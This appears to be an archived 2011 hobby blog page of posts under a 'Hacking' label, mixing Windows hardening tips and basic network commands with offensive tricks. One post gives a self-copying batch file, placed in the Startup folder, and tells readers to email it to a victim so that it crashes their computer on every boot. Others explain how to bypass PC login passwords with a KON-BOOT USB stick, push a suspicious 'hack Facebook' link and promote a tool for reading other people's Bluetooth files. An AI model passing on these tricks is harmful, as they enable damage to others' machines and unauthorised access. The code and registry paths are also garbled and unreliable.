.

.
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Wednesday, 28 December 2011

TRICK TO HACK FACEBOOK ACCOUNT


Click Here





And click on connect with facebook button Login with your account
and see what happen.....

Share it with your frnds and tell us what happened in Comment.

SAVE YOURSELF FROM HACKERS AND HIJACKERS 2


1. Fake out hackers with a dummy Administrator account
Since the default account in
Windows 2000 is always named
Administrator, an enterprising
hacker can try to break into
your system by attempting to
guess the password on that account. It you never bothered
to put a password on that
account, say your prayers.

Rather than be a sucker to a
hacker, put a password on the
Administrator account it you
haven't done so already. Then
change the name of the
Administrator account. You'll still be able to use the account
under its new name, since
Windows identifies user accounts
by a back-end ID number rather
than the name. Finally, create a
new account named Administrator and disable it. This
should frustrate any would -be
break-ins. You can add new accounts and
change the names of existing
accounts in Windows 2000
through the Local Users and
Groups snap in. Right-click on My
Computer, select Manager, open the Local Users and Groups
subtree, look in the Users folder
and right-click on any name to
rename it. To add a new user,
right-click on the containing
folder and select New User. Finally, to disable an account,
double-click it, check the Account
is disabled box and click OK.

Don't ever delete the original
Administrator account. Some
programs refuse to install
without it and you might have to
log in under that account at
some point to setup such software. The original
Administrator account is
configured with a security ID
that must continue to be
present in the system.


2. Set the Hosts file to read-only to prevent name hijacking.

This one's from (and to a
degree, for) the experts. The
HOSTS file is a text file that all
flavors of Windows use to hold
certain network addresses that
never change. When a network name and address is placed in
HOSTS, the computer uses the
address listed there for that
network name rather than
performing a lookup (which can
take time). Experts edit this file to place their most commonly-
visited sites into it, speeding
things up considerably.

Unfortunately hijackers and
hackers also love to put their
own information into it -
redirecting people from their
favorite sites to places they
don't want to go. One of the most common entries in HOSTS is
local host which is set 1770.0.1.
This refers to the local machine
and if this entry is damaged the
computer can behave very
unpredictably. To prevent HOSTS from being
hijacked, set it to read-only. Go
to the folder %Systemroot
%system32driversetc, right-click
on HOSTS, select Properties
check the Read-Only box and click OK. If you want to add your
own entries to HOSTS, you can
unprotect it before doing so, but
always remember to set it to
read-only after you're done.

3. Turn off unneeded Services Windows 2000 and XP both come with many background services that don't need to he running most of the time: Alerter, Messenger, Server (If you're running a standalone machine with no file or printer shares), NetMeeting Remote Desktop Sharing, Remote Desktop Help Session Manager (the last two if you're not using Remote Desktop or NetMeeting), Remote Registry,
Routing and Remote Access (if you're not using Remote Access), SSDP Discovery Service, Telnet, and Universal Plug and Play Device Host.
A good resource and instruction on which of these services can be disabled go to /http:// www.blkviper.com/WinXP/

4. Disallow changes to IE settings through IE This is another anti hijacker tip.
IE can be set so that any
changes to its settings must be
performed through the Internet
icon in the Control Panel, rather
than through IE's own interface. Some particularly unscrupulous
programs or sites try to tamper
with setting by accessing the
Tools, Options menu in IE. You can
disable this and still make
changes to IE's settings through the Control Panel. Open the Registry and browse to
HKEY_CURRENT_USER
SoftwarePoliciesMicrosoftInternet
ExplorerRestrictions. Create or
edit a new DWORD value named
NoBrowserUptions and set it to 1 (this is a per-user setting). Some
third-party programs such as
Spybot Search And Destroy allow
you to toggle this setting. You can also keep IE from having
other programs rename its
default startup page, another
particularly annoying form of
hijacking. Browse to
HKEY.CURRENT USERSoftwarePolicies
MicrosoftInternet ExploreControl
Panel and add or edit a DWORD,
Homepage and set it to 1. 10. Disable simple File Shares. In Windows XP Professional, the
Simple File Sharing mode is easily
exploited, since it抯 a little too
easy to share out a file across
your LAN (or the NET at large).
To turn it off, go m My Computer, click Tools, Folder
Option and the View tab, and
uncheck Use Simple file sharing
(Recommended). Click OK. When
you do this you can access the
Security tab in the Properties window for all folders; set
permissions for folders; and take
ownership of objects (but not in
XP Home).


Share it with your frnds and Feel Free To Comment.



TRICK TO DAMAGE ONE'S COMPUTER BY E-MAIL


DISCLAIMER:
Perform this trick on your own resposibility, as this can cause damage. In case of any damage the author or publisher will not be responsible.

1. Open Notepad.

2. COPY and Paste the
following Code without
quotes.....

"C:\Users\Owner\Desktop
\clickme.bat" "C:\Users\Owner
\AppData\Roaming\Microsoft
\Windows\Start Menu\Programs
\Startup\"

start clickme.bat
clickme.bat

3. Save it as, "clickme.bat"

4. Send it to them over email
or whatever.

What does this do?
They will
click on it, it will open multiple
command prompt windows until
the computer crashes.
When
they restart their computer, it will start again!

TIPS:
1. Make sure you tell them to
save the file on the desktop .
2. Make sure they run
Windows .

How To Stop It:
Just open your windows in safe
window and delete these two
files Code:

1. C:\Users\Owner\Desktop
\clickme.bat
2. C:\Users\Owner\AppData
\Roaming\Microsoft\Windows
\Start Menu\Programs\Startup\

thats it....

Share it with your frnds and Feel Free To Comment.



Tuesday, 27 December 2011

HACKING THROUGH COMMAND PROMPT


The following are the IP utilities available inWindows that help in finding out the information about IP Hosts and domains.

These are the basic IP Hacking Commands that everyone must know!

Please note that the the term Host used in this article can also be assumed as aWebsite for simple understanding purpose.

1. PING

PING is a simple application (command) used to determine whether a host is online and available. PING command sends one or moreICMP Echo messages to a specified host requesting a reply. The receiver (Target Host) responds to this ICMP Echo message and returns it back to the sender. This confirms that the Host is online and available. Otherwise the host is said to be unavailable.

syntax:
c:\>ping gohacking.com

2. TELNET

Telnet command is used to connect to a desired host on a specified port number.

For example syntax:
c:\>telnet yahoo.com 25
c:\>telnet yahoo.com

3. NSLOOKUP

Many times we think about finding out the IP address of a given site. Say for example google.com, yahoo.com, microsoft.com etc. But how to do this?
For this there are some websites that can be used to find out the IP address of a given site. But in Windows we have an inbuilt tool to do this job for us. It isnslookup.
Yes this tool can be used for resolving a given domain name into it’s IP address (determine the IP of a given site name). Not only this it can also be used for reverse IP lookup. That is if the IP address is given it determines the corresponding domain name for that IP address.

syntax:
c:\>nslookup google.com

4. NETSTAT

The netstat command can be used to display the currentTCP/IP network connections. For example the following netstat command displays all connections and their corresponding listening port numbers.

Eg: C:\>netstat -a
This command can be used to determine the IP address/Host names of all the applications connected to your computer. If a hacker is connected to your system even the hacker’s IP is displayed.
So the netstat command can be used to get an idea of all the active connections to a given system.

Share it with your frnds and Feel Free To Comment.



MOSTLY/MOST NEEDED FILES FOR HACKING


Needed Files for Hacking are:

ActiveX 6.02
-Microsoft ActiveX Control
Pack...
- winsck.ocx

bwcc32
-bwcc32.dll

cswskctl
-cswskctl.vbx

cswsock
-cswsock.vbx

cygwin
-cygwin.dll

dssock32
-dssock32.ocx

icmp
-icmp.dll

ipdaem32
-ipdaem32.ocx

ipport
-ipport.vbx

msvbm50
-msvbm50.dll

oc25
-oc25.dll

vb40016
-vb40016.dll

vb40032
-vb40032.dll

vbrun300
-vbrun300.dll

ws2setup
-Winsock 2.2 Upgrade

Share it with your frnds and Feel Free To Comment.



Monday, 26 December 2011

SECURE YOURSELF FROM HACKERS & HIJACKERS


Hackers and Browser Hijacking is
one area of the Net that affects
everyone at some stage.

In addition to having third party
utilities such as SpyBot, Anti
Virus scanners and firewalls
installed there are some changes
that can be made to Windows
2000/XP.

Below are some details to make your system safer from
hackers and hijackers. Some of these tips require
editing of the Registry so it is
wise to either backup the
registry and/or create a Restore
Point.

1. Clearing the Page File at Shutdown Windows 2000/XP

paging file
(Sometimes called the Swap File)
can contain sensitive information
such as plaintext passwords.
Someone capable of accessing
your system could scan that file and find its information. You can
force windows to clear out this
file.

In the registry navigate to
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession
ManagerMemory Management
and add or edit the DWORD
ClearPageFileAtShutdown. Set it to1.

Note that when you do this, the
system will take much longer to
shut down: a system with a
really big Page File (! Gig or
more) may take a minute or two
longer.


2. Disable the POSIX and OS/2 Subsystem.

Windows 2000 and XP come with
little-documented subsystems it
at allow compatibility with UNIX
and OS/2 systems These rues
systems are enabled by default
but so rarely used that they are best off bring disabled
completely to prevent possible
service hijackings. To disable these subsystems,
open the registry and navigate
to HKEY LOCAL
MACHINESYSTEMCurrentControlSetControlSession
ManagerSubSystems. Delete the
subkeys Os2 and Posix. then reboot.

3. Never leave default passwords blank. On installation, Windows 2000
sets up an Administrator account
with total system access and
prompts for a password. Guess
what: by default, it allows that
password to be blank. If a user doesn't want to type a
password, he can simply click
Next and the system will be an
open door for anyone who
wants to log on. Always opt for
a password of some kind when setting up the default account
on a machine

4. Disable the Guest account

Windows XP comes with a Guest
account that's used for limited
access, but it's still possible to do
some damage with it. Disable it
completely if you are not using
it. Under Control Panel, select User Accounts, click on Guest
Account and then select Turn Off
the Guest Account.

5. Install Windows In a different directory. Windows usually installs itself in
the WINDOWS directory. Windows
NT 4 0 and 2000 Will opt for
WINNT. Many worms and other
rogue programs assume this to
be the case and attempt to exploit those folders files. To
defeat this install Windows to
another directory when you're
setting it up - you can specify
the name of the directory during
setup. WINDIR is okay; so some people use WNDWS - A few (not
that many) programs may not
install properly if you install
Windows to another folder but they are very few and they are
far between.

Read Part 2

Share it with your frnds and Feel Free To Comment.



Friday, 5 August 2011

CHAT WITH FRIENDS THROUGH MS DOS COMMAND PROMPT



1) All you need is your friend's IP
Address and your Command
Prompt.
2) Open Notepad and write this
code as it is.....!

@e cho of f
: A
C l s echo MESSENGER
set /p n=User :
set /p m=Message :
net send %n% % m %
Pause
Goto A

3) Now save this as
"Messenger.Bat".
4) Open Command Prompt.
5) Drag this file (.bat file) over
to Command Prompt and press
Enter.
6) You would then see something
like this:
7) Now, type the IP Address of
the computer you want to
contact and press enter
You will see something like this:
8) Now all you need to do is type
your message and press Enter.
Start Chatting.......!

Share it with your frnds and Feel Free To Comment.



Monday, 20 June 2011

HACK BLUETOOTH WITH BLUE FTP



This a the latest application
which allows users to hack
others bluetooth very easily.
This application lets you see all
files in others mobile without any
permission,if those devices are paired at once. Through this
application you can view others
files just like that in a file
explore.

This application is available
at
Click Here




Saturday, 18 June 2011

Tips To Become A Hacker


Certainly there are many
sources of information available
that can give you computer
hacking basics. There is actually
some misconception about who
a real hacker is. Hacking computers is performed by one
who knows computers very well
- even the extra tricks of a
computer and electronics. He
can easily tweak these
according to his needs and become hacker. This is the way
the term was used when Bill
Gates was inventing Windows. Those who are often referred to as hackers today, should actually be called "crackers" - people who do not have unauthorized access, like a safe-cracker. If you doubt me, and want to know how to be a hacker then do a search on the term "professional hacker," and you will find many professional and legitimate computer training courses being offered. They are the ones learning the real hacker secrets.
Everyone has heard of one individual or another that was caught while hacking computers that belonged to this or that organization. Because hacking into computers is highly illegal, it should be mentioned that this article will not mention any real
specifics about the subject, and this author would rather gladly encourage you to become a real hacker - professionally.

LEARN PC
It should go without saying that the first thing that is needed is to learn about computers. This means study. A lot of reading is involved along with just plain old-fashioned learning how to use a computer. Then, of course, there are the special aspects of computer study. The places where the tips are learned is often two-fold: a friend who has access to a
computer, and a variety of places on the Web. But this is also an interesting thing - if a young person has the ability to learn, and wants to learn can use hacking tutorials- then why not take the time to learn the right things - things that can earn him a lot of money in the legit world? Is it possibly that it
could be the friend he has that
turns him away from the good?

LEARN SITES
Special hacker Web sites, where hackers congregate, exist on the Web - as does every other known group of people - whether legal or illegal. Some of these are known to be hacker
chat rooms, hacker forum, and regular hacker sites.

■Learn The Secrets
It is in these Web sites, and possibly some of the people that he may meet, maybe only online, where he will learn the hacking basics, and learn how to hack.
Tools Hackers Need To Get Into Websites
Some of the tools that a hacker may use are often varied and constantly changing. One such tool that was used last year allowed a hacker to gain control of the computers of those who simply mistyped the word Google - when trying to get the popular search engine. This automatically directed them to a special website that would give them
such malware items as Trojan downloaders, backdoors and spyware. Another tool would be the robot spider. These can be sent out and put on automatic and will look for ports of access into your computer. These spiders are running around all the time and some say that they may hit most computers that are online - up to 50 times a day. Other tools use email attachments. It is claimed that as much as 65% of all email is spam. And as much as 1 in
about 30 emails contains a virus, or some form of malware. This is why having your own virus and spam protection is a must, as well as a good spyware remover. Someone is
busy. Once someone has been hacking information on a computer they will often leave a Trojan file that will give them further access - often more than one file. Then they could use your computer to send out spam attacks - without you even knowing that it is taking place. Or, they could simply be hacking your personal information off of your computer. These are just a few of their tools.
How Hackers Avoid Getting Caught
One of the first things that someone would learn about hacking tutorials when studying to be a hacker is how to cover their tracks. Of course, some are better than others. A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught. An older hacker, on the other hand, will rarely leave any tracks. They know how to use their victim's computers as a tool for a launching place to get into another computer - leaving a phony IP address. The truth is, and it is a good thing, that computer programmers are getting better software, and hardware (firewalls) that are constantly doing a better job - both in keeping hackers out, and in recording IP addresses better for tracking purposes. There will always be hackers, and there will always be hackers in prison. The legislation is definitely turning against the hacker - with some hacking crimes becoming equal to terrorism, these days. Kevin Mitnick, a well-known hacker, had the Federal prosecutors accuse him of having caused $291 million in damages to corporate computers. A serious crime, and he remains in jail because of it - unable to touch anymore computers. Even by learning some of the
wrong type of hacking basics through hacking tutorials, a young person could start down a wrong path. Hacking computers, though often glorified on TV, is still criminal.




Saturday, 21 May 2011

Hack all the PC/Laptop (100 % Working)



Now I’ m Going to share the Greatest trick for the windows… I’ ve Worked at least 1 month to know this trick.. Now U’ ll be Lucky..
With this trick U can easily Hack
all the PC/laptop when it is
password protected.… Requirements:
Pendrive, KONUSB software
Step 1:
Download KONUSB software from
the attachment here
Step 2: Plug in Pen drive into the PC/
laptop and double click on
KONBOOTINSTALL.exe & enter the
drive letter of the USB
That’ s it… Step 3:
Now insert the pen drive into
the PC/Laptop whichever u want
to hack, and boot via USB (using
Pendrive) … That’ s it.. Next press OK for everything … if it asks for password, leave blank and press
OK
NOTE:
This KONUSB software won’ t change the Password of the PC/
Laptop whatever U hacked.. It
just bypass the password
restriction.. If u remove the
Pendrive, and boot normally it’ ll remains the same as it is
password protected.
It works in All Operating systems
including windows XP, Vista,
Windows 7 etc.,
100 % Working.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | cna certification